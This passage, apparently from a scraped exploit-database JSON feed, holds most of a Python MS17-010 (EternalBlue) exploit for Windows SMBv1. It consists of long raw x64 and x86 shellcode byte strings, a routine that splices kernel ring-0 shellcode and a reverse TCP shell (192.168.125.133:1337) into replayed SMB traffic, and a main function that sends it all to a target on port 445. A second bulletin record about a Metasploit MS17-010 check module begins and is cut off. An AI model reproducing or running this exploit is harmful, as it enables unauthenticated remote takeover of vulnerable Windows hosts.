\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 21, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('close', 3, 9.967667061999236)\", \"('close', 4, 0.0)\", \"('close', 5, 0.0)\", \"('close', 6, 0.0)\", \"('close', 7, 0.0)\", \"('close', 8, 0.0)\", \"('close', 9, 0.0)\", \"('close', 10, 0.0)\", \"('close', 11, 0.0)\", \"('close', 12, 0.0)\", \"('close', 13, 0.0)\", \"('close', 14, 0.0)\", \"('close', 15, 0.0)\", \"('close', 17, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00#\\\\xffSMBq\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('close', 18, 0.0)\", \"('close', 19, 0.0)\", \"('close', 20, 0.0)\", \"('close', 21, 0.0)\", \"('recv', 1, 0.0)\", '(\\'send\\', 1, 
b\"\\\\x00\\\\x00\\\\x00\\'\\\\xffSMBt\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x02\\\\xff\\\\x00\\'\\\\x00\\\\x00\\\\x00\", 0.0)', \"('recv', 1, 0.0)\", \"('close', 1, 0.0)\"]\r\n datfile = [ast.literal_eval(i) for i in datfile]\r\n orig_shellcode = binascii.unhexlify(b'31c040907408e809000000c22400e8a7000000c3e801000000eb905bb9760100000f32a3fcffdfff8d431731d20f30c3b9230000006a300fa18ed98ec1648b0d400000008b6104ff35fcffdfff609c6a23529c6a0283c2089d804c2401026a1bff350403dfff6a0055535657648b1d1c0000006a3b8bb324010000ff3331c04889038b6e286a0183ec4881ed9c020000a1fcffdfffb97601000031d20f30fbe811000000fa648b0d400000008b610483ec289d61c3e9ef000000b9820000c00f3248bbf80fd0ffffffffff8953048903488d050a0000004889c248c1ea200f30c30f01f865488924251000000065488b2425a801000050535152565755415041514152415341544155415641576a2b65ff34251000000041536a33514c89d14883ec08554881ec58010000488dac248000000048899dc00000004889bdc80000004889b5d000000048a1f80fd0ffffffffff4889c248c1ea204831dbffcb4821d84831c9b9820000c00f30fbe838000000fa65488b2425a80100004883ec78415f415e415d415c415b415a415941585d5f5e5a595b5865488b2425100000000f01f8ff2425f80fd0ff31c040900f84b5050000e800000000586089c389e583ec48648b0d38000000668b4106c1e010668b01662500f08b086681f94d5a74072d00100000ebf08945fc5389c3b9940169e3e83e0100008945f8b9855483f0e8310100008945f4b92e5b51d2e8240100008945ec5b8d55e831c9890a526a00526a0bffd08b55e885d20f8402010000526a00ff55f885c00f84f4000000506a00ff75e8506a0bff55ec85c00f85e000000058502dfc000000051c01000050e880010000b9fa3cadc239c8741eb91abd4b2b39c87415588b55e881ea1c0100000f8cac0000008955e8ebce588b70ecff55f489f05050682e6461746a61e82702000085c00f84880000005883e940e85a02000085c074158b16c1ea1889f0c1e81839d075078b464885c0740a83c60483e904e35eebd88975f05668f80f00006a00ff55f885c0744a5089c731c089c16681c10004f3ab5889008b550489500431d78b55f889500831d78b55f489500c31d78b55
f089501031d789782483c04889c78db396030000b91a020000f3a45b89433889ec61c3535251575589e583ec1889cf89d88945fce87a00000085c0746d8945f8e8ee0000008945f48b45fc8b4df8e80e01000085c074538945f08b45fc8b4df8e80401000085c074418945ec8b45fc8b4df8e8fa00000085c0742f8945e88b45fc89f98b55ec8b5df4e8ab00000085c0741889c18b45e8e8dd0000006689c28b45fc8b4df0e8d700000083c4185d5f595a5bc35689c683c63c8b3601c666813e5045750983c6788b3601f05ec331c0ebfa56515789c631c089c7c1e70729c789f831c98a0e80f900740501c846ebe95f595ec356575289c631c089c7c1e70729c789f831d28a1601d046e2ee5a5f5ec356515789c631c089c7c1e70729c789f831c98a0e80f90074c601c84646ebe85f595ec383c0188b00c357565131ff89c639df74198b04ba01f0e883ffffff39c8740747ebeb595e5fc389f8ebf831c0ebf483c11c8b0901c8c383c1208b0901c8c383c1248b0901c8c3d1e101c8668b00c381e2ffff0000c1e20201d18b0901c8c352568b74240c8b4c241031d2d1e985c9740cc1c205ac460c2030c249ebf089d05e5ac20800585a5f5e505689f083c63c8b3601c631c089c1668b4e06668b461401c683c61885c9741d8b0639f875078b460439d0740683c62849ebe98b460c8b4e085e01c6c331f6c36031c083f80f741e31c98b3c868b148e39d774034175f30fb694038703000039d1750d40ebdd4139c875056131c040c36131c0c3000102030405060708090a09090d0e8b4c240860e8000000005d6681e500f0894d34e8d9010000e843010000e87f01000085c00f84e30000008b5d3c8b4bd8e8170100003c23740d3c77741c3cc87422e9b60000008b4d388b452489410e31c0884112e99f000000e813010000e9b50000008b5d3c8b43e88b303375288b7808337d288b40043345283b431089c3757b8b4d3039f18b452c7418e8f20000008d4604506a00ff550885c0746389452c89753001df39f7775329df01c75789f28b753c8b76f089d9f3a45e89d9c1e9028b5d28311e83c604e2f901d039c67c288b452c6089e650ffd089f461e8a10000008b4524d1e831c988c101e98b0931c8894524e868000000b010eb08b020eb04b030eb008b4d38b4006601411e8b45108944241c61ff603c8d45488b4d0c89884701000089a83e01000066b810008b4d386601411e8b45108944241c6168000000008b403c506800000000c331c088c8c1e90800c8c1e90800c8c1e90800c8c3518b452489c10fc9d1e031c889452859c360e80b0000008b45108b483c89483861c3608b5d2c85db740d31c089df8b4d30f3aa53ff550c31c089453089452c61c357525689cf8b55448b0a
e83900000085c0750e83c2088b0ae82b00000085c07421894d446a0c588d71543b06740783c6043b06750d3b4604750889753c31c040eb0231c05e5a5fc331c039c17d0140c3525131d2668b510201ca3b11740583c104ebf75a8d411c83c00724f88945448b41f889453889d15ac35355575641544155415641574889e54881ec800000006683e4f0e883030000488945f84889c3b92e5b51d2e8ee0100004885c00f84d50100004889c6b9940169e3e8d80100004885c00f84bf010000488945f04889c7b9855483f0e8be0100004885c00f84a5010000488945e84c8d4dd04d31c04c89c1448945d04c89c2b10bffd6448b45d04585c00f847f0100008b55d04831c9ffd74885c00f846e0100004889c34831c94989c9448b45d04889c2b10bffd64885c00f85510100004889d8482df80000004805280100008b55d081ea280100000f8c330100008955d050e83f0200004889c258b9fa3cadc24839ca740ab91abd4b2b4839ca75ca488b70e84889d9ff55e84889f04831d24889c38b503c4801d04889c64831c94889ca668b4806668b50144801d64883c61848bf2e646174610000004883f9000f84cd000000488b064839f874094883c62848ffc9ebe58b460c8b4e084801c648bbfefefefefefefefe4883e9084883f9000f8c9b000000488b3e4839df750c4c8b86980000004d85c074064883c608ebd84883c608488975e04831c9baf00f0000ff55f04885c074694989c14831c0b9000400004c89cff3ab4c89cf4883c760488d35910200004831c966b93602f3a44d8909488b5df8498959084831df488b5df0498959104831df488b5de8498959184831df488b5de0498959204831df41897944488b45e04883c0704983c1604c890848')\r\n \r\n # ASM Multi-Arch Kernel Ring 0 Shellcode by ZeroSum0x0: https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm\r\n # Modification to this shellcode:\r\n # Code has been modified to call \"KeUnstackDetachProcess\" aproper KeUnstackDetachProcess routine detaches the current thread from the address space of a process and restores the previous attach state. \r\n # Every successful call to KeStackAttachProcess must be matched by a subsequent call to KeUnstackDetachProcess. 
\r\n kernel_shellcode = binascii.unhexlify(b'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') \r\n \r\n # Shellcode TCP Bind port: 1337 size 484 bytes\r\n bindtcp_shellcode = binascii.unhexlify(b'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')\r\n \r\n # Shellcode TCP Reverse to 192.168.125.133 1337 \r\n reversetcp_shellcode = binascii.unhexlify(b'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')\r\n \r\n shellcode = reversetcp_shellcode\r\n new_shellcode = kernel_shellcode + int(len(shellcode)).to_bytes(2,'little') + shellcode\r\n to_replace = orig_shellcode[:len(new_shellcode)]\r\n new_datfile = []\r\n for i in datfile:\r\n if i[0] != 'send':\r\n new_datfile.append(i)\r\n continue\r\n j = list(i)\r\n j[2] = j[2].replace(to_replace,new_shellcode)\r\n new_datfile.append(tuple(j))\r\n open(\"smb.dat\",\"w\").write(\"\\n\\n\".join([repr(i) for i in new_datfile]))\r\n \r\ndef main(hostip):\r\n # Modify original .dat file and add/replace Kernel Shellcode by Zerosum0x0 + User Shellcode\r\n mod_replay()\r\n # Read dat file and send it over\r\n dattosend = open(\"smb.dat\").read().split(\"\\n\\n\")\r\n dattosend = [ast.literal_eval(i) for i in dattosend]\r\n connections = []\r\n userid = b'\\x00\\x08'\r\n treeid = b'\\x00\\x08'\r\n start = time.monotonic()\r\n for i in dattosend:\r\n delta = i[-1] - (start - time.monotonic())\r\n if delta > 0:\r\n time.sleep(delta)\r\n start = time.monotonic()\r\n if i[0] == \"connect\":\r\n sock = socket.socket()\r\n sock.connect((hostip,445))\r\n connections.append({\"socket\":sock,\"stream\" : i[1]})\r\n if i[0] == \"close\":\r\n [j['socket'].close() for j in connections if j[\"stream\"] == i[1]]\r\n if i[0] == \"send\":\r\n data = i[2].replace(b\"__USERID__PLACEHOLDER__\", userid)\r\n data = data.replace(b\"__TREEID__PLACEHOLDER__\", treeid)\r\n [j['socket'].send(data) for j in connections if j[\"stream\"] == i[1]]\r\n if i[0] == \"recv\":\r\n data = [j['socket'].recv(2048) for j in connections if j['stream'] == 
i[1]]\r\n if len(i) > 3:\r\n if i[2] == \"treeid\":\r\n treeid = data[0][28:30]\r\n if i[2] == \"userid\":\r\n userid = data[0][32:34]\r\n os.remove(\"smb.dat\")\r\n print(\"[*] Thanks NSA!\")\r\n print(\"[*] Creditz: @EquationGroup @ShadowBrokers @progmboy @zerosum0x0 @juansacco\")\r\n print(\"[*] KPN Red team: <[email\u00a0protected]>\")\r\n \r\nif __name__ == \"__main__\":\r\n print(\"[*] MS17-010 Exploit - SMBv1 SrvOs2FeaToNt OOB\")\r\n print(\"[*] Exploit running.. Please wait\")\r\n main(sys.argv[1])\n\n# 0day.today [2018-03-19] #", "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.zdt.ZDTBulletin", "robots.models.base.Bulletin"]}, {"id": "1337DAY-ID-27613", "hash": "7a664c638139ed90355f85360cad3cd0", "type": "zdt", "bulletinFamily": "exploit", "title": "Microsoft Windows - Uncredentialed SMB RCE (MS17-010) Exploit", "description": "This Metasploit module uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does not have the MS17-010 patch. This Metasploit module does not require valid SMB credentials in default server configurations. 
It can log on as the user \"\\\" and connect to IPC$.", "published": "2017-04-17T00:00:00", "modified": "2017-04-17T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/27613", "reporter": "Sean Dillon", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2018-01-10T11:22:44", "history": [], "viewCount": 43, "enchantments": {"score": {"value": 4.6, "vector": "NONE", "modified": "2018-01-10T11:22:44", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", 
"RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", 